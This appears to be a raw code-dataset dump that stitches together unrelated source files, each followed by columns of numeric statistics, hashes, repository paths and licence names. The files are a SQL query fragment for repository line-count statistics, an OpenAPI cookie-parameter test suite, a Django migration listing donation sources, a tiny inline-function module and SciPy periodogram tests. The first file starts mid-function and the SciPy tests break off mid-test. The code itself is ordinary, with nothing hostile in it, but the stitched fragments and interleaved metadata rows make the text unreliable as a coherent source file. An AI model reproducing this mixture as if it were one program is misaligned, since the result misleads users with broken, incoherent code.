SELECT repos.name, SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY month, repos.name
) b ON a.month = b.month
ORDER BY month, name
""")
elif interval == "week":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY week, repos.name
) b ON a.week = b.week
ORDER BY week, name
""")
else:
if interval == "month":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY month, repos.name
) b ON a.month = b.month
ORDER BY month, name
""")
elif interval == "week":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY week, repos.name
) b ON a.week = b.week
ORDER BY week, name
""")
results = pd.read_sql(cdRgTpIntervalLocCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "calendar_year": calendar_year, "repo_group": repo_group})
return results
| 51.76699
| 228
| 0.565106
| 4,266
| 37,324
| 4.810595
| 0.059306
| 0.033769
| 0.030406
| 0.032453
| 0.887535
| 0.870432
| 0.85211
| 0.842267
| 0.832716
| 0.817513
| 0
| 0.005114
| 0.345113
| 37,324
| 721
| 229
| 51.76699
| 0.834472
| 0.116011
| 0
| 0.800738
| 0
| 0.079336
| 0.751067
| 0.080593
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023985
| false
| 0.00369
| 0.009225
| 0
| 0.057196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13a39b83fe27c2a09cc4a5b2b2374e472f282c4e
| 18,322
|
py
|
Python
|
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
import typing
import pytest
from pydantic import BaseModel
from starlette.responses import Response
from starlette.testclient import TestClient
from xpresso import App, CookieParam, FromCookie, Path
from xpresso.typing import Annotated
@pytest.mark.parametrize(
"explode",
[True, False],
)
def test_serialization(
explode: bool,
) -> None:
async def endpoint(
cookie: Annotated[int, CookieParam(explode=explode)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": explode,
"schema": {"title": "Cookie", "type": "integer"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_scalar() -> None:
async def endpoint(cookie: FromCookie[int]) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {"title": "Cookie", "type": "integer"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_array() -> None:
async def endpoint(
# arrays only work with explode=False
cookie: Annotated[typing.List[int], CookieParam(explode=False)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": False,
"style": "form",
"explode": False,
"schema": {
"title": "Cookie",
"type": "array",
"items": {"type": "integer"},
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
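# For reference: with style=form and explode=False, OpenAPI serializes an
# array cookie as a single comma-joined value (e.g. "Cookie: cookie=1,2").
# A hedged request sketch (cookie-passing details vary across TestClient
# versions, so this is illustrative only):
#
#     with TestClient(app) as client:
#         client.get("/", cookies={"cookie": "1,2"})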
def test_object() -> None:
class ShallowObject(BaseModel):
foo: int
bar: str
async def endpoint(
# objects only work with explode=False
cookie: Annotated[ShallowObject, CookieParam(explode=False)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": False,
"schema": {"$ref": "#/components/schemas/ShallowObject"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ShallowObject": {
"title": "ShallowObject",
"required": ["foo", "bar"],
"type": "object",
"properties": {
"foo": {"title": "Foo", "type": "integer"},
"bar": {"title": "Bar", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_default() -> None:
async def endpoint(cookie: FromCookie[int] = 2) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": False,
"style": "form",
"explode": True,
"schema": {
"title": "Cookie",
"type": "integer",
"default": 2,
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_nullable() -> None:
async def endpoint(cookie: FromCookie[typing.Optional[int]]) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"title": "Cookie",
"type": "integer",
"nullable": True,
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
| 35.855186
| 90
| 0.304825
| 943
| 18,322
| 5.897137
| 0.104984
| 0.058083
| 0.046754
| 0.032728
| 0.880237
| 0.871606
| 0.858838
| 0.831325
| 0.831325
| 0.825571
| 0
| 0.011385
| 0.558946
| 18,322
| 510
| 91
| 35.92549
| 0.676773
| 0.00393
| 0
| 0.656842
| 0
| 0
| 0.21198
| 0.026854
| 0
| 0
| 0
| 0
| 0.025263
| 1
| 0.012632
| false
| 0
| 0.014737
| 0
| 0.033684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13d3f13e1966a5fc3a79ab41a67c23e5257295f1
| 6,108
|
py
|
Python
|
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-03-01 13:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contributions', '0060_auto_20170211_1019'),
]
operations = [
migrations.AlterField(
model_name='bulkpayment',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, verbose_name='Source'),
),
migrations.AlterField(
model_name='contribution',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, verbose_name='Source'),
),
migrations.AlterField(
model_name='pledge',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, verbose_name='Source'),
),
]
| 197.032258
| 1,828
| 0.662737
| 754
| 6,108
| 5.346154
| 0.167109
| 0.026792
| 0.029025
| 0.035723
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0
| 0.089644
| 0.117878
| 6,108
| 30
| 1,829
| 203.6
| 0.6585
| 0.011133
| 0
| 0.521739
| 1
| 0
| 0.663243
| 0.096737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.086957
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
13dc36f680a34bf80232f6e50244bcea2b9c9bc7
| 127
|
py
|
Python
|
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
import athanor
def charactername(*args, **kwargs):
return args[1]
def accountname(*args, **kwargs):
return args[1]
| 12.7
| 35
| 0.669291
| 16
| 127
| 5.3125
| 0.5625
| 0.235294
| 0.376471
| 0.470588
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019417
| 0.188976
| 127
| 9
| 36
| 14.111111
| 0.805825
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
b95f442239c6121b35771c9d2e30434316de4c18
| 53,360
|
py
|
Python
|
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_, assert_approx_equal,
assert_allclose, assert_array_equal, assert_equal,
assert_array_almost_equal_nulp, suppress_warnings)
import pytest
from pytest import raises as assert_raises
from scipy import signal
from scipy.fft import fftfreq
from scipy.signal import (periodogram, welch, lombscargle, csd, coherence,
spectrogram, stft, istft, check_COLA, check_NOLA)
from scipy.signal.spectral import _spectral_helper
class TestPeriodogram(object):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_odd(self):
x = np.zeros(15)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 1/16.0)
q[0] = 0
assert_allclose(p, q)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, scaling='spectrum')
g, q = periodogram(x, scaling='density')
assert_allclose(f, np.linspace(0, 0.5, 9))
assert_allclose(p, q/16.0)
def test_integer_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_integer_odd(self):
x = np.zeros(15, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 1/16.0)
q[0] = 0
assert_allclose(p, q)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 5.0/16.0)
q[0] = 0
assert_allclose(p, q)
def test_unk_scaling(self):
assert_raises(ValueError, periodogram, np.zeros(4, np.complex128),
scaling='foo')
def test_nd_axis_m1(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((2,1,10))
x[:,:,0] = 1.0
f, p = periodogram(x)
assert_array_equal(p.shape, (2, 1, 6))
assert_array_almost_equal_nulp(p[0,0,:], p[1,0,:], 60)
f0, p0 = periodogram(x[0,0,:])
assert_array_almost_equal_nulp(p0[np.newaxis,:], p[1,:], 60)
def test_nd_axis_0(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((10,2,1))
x[0,:,:] = 1.0
f, p = periodogram(x, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_array_almost_equal_nulp(p[:,0,0], p[:,1,0], 60)
f0, p0 = periodogram(x[:,0,0])
assert_array_almost_equal_nulp(p0, p[:,1,0])
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, 10, 'hann')
win = signal.get_window('hann', 16)
fe, pe = periodogram(x, 10, win)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, periodogram, x,
10, win_err) # win longer than signal
def test_padded_fft(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
fp, pp = periodogram(x, nfft=32)
assert_allclose(f, fp[::2])
assert_allclose(p, pp[::2])
assert_array_equal(pp.shape, (17,))
def test_empty_input(self):
f, p = periodogram([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_nfft(self):
x = np.zeros(18)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_nfft_is_xshape(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9, 'f')
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(15, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8, 'f')
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
